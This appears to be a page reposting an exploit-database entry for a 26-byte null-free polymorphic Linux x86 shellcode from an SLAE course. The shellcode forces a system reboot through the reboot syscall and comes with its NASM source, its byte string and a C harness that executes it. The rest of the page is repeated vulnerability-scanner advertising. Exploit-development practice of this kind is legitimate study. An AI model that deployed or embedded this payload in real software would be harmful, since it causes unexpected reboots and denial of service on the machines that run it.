linuxx86 reboot polymorphic shellcode (26 bytes)

▸▸▸ Exploit & Vulnerability >>   shellcode exploit & linux_x86 vulnerability




linuxx86 reboot polymorphic shellcode (26 bytes) Code Code...
				
# Exploit Title: Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes) # Purpose: This is a x86 Linux null-free polymorphic shellcode for forcing a reboot. # Date: 2020-03-23 # Author: Upayan a.k.a. slaeryan # Contact: upayansaha@icloud.com # SLAE: 1525 # Vendor Homepage: None # Software Link: None # Tested on: Linux x86 # CVE: N/A /* ; Filename: reboot_polymorphic.nasm ; Author: Upayan a.k.a. slaeryan ; SLAE: 1525 ; Contact: upayansaha@icloud.com ; Purpose: This is a x86 Linux null-free polymorphic shellcode for forcing a reboot. ; Testing: ./reboot_polymorphic ; Compile with: ./compile.sh reboot_polymorphic ; Size of shellcode: 26 bytes global _start section .text _start: xor eax, eax ; Clearing the EAX register xor ebx, ebx ; Clearing the EBX register xor ecx, ecx ; Clearing the ECX register cdq ; Clearing the EDX register mov al, 0x58 ; Loading syscall value = 0x58 for reboot in AL mov ebx, 0xfee1dead ; Loading magic 1 in EBX mov ecx, 672274793 ; Loading magic 2 in ECX mov edx, 0x1234567 ; Loading cmd val = LINUX_REBOOT_CMD_RESTART in EDX int 0x80 ; Executing the reboot syscall */ #include <stdio.h> #include <string.h> unsigned char code[] = \ "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\x58\xbb\xad\xde\xe1\xfe\xb9\x69\x19\x12\x28\xba\x67\x45\x23\x01\xcd\x80"; void main() { printf("Shellcode Length: %d\n", strlen(code)); int (*ret)() = (int(*)())code; ret(); }

Linuxx86 reboot polymorphic shellcode (26 bytes) Vulnerability / Exploit Source : Linuxx86 reboot polymorphic shellcode (26 bytes)



Last Vulnerability or Exploits

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Discover posible vulnerabilities before GO LIVE with your project
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Do an audit to find and close the high risk issues before having a real damage and increase the costs
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Bypass your network restrictions and scan from our IP for relevant results
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Scan your website from any device with internet connection

Tusted by
clients

 
  Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.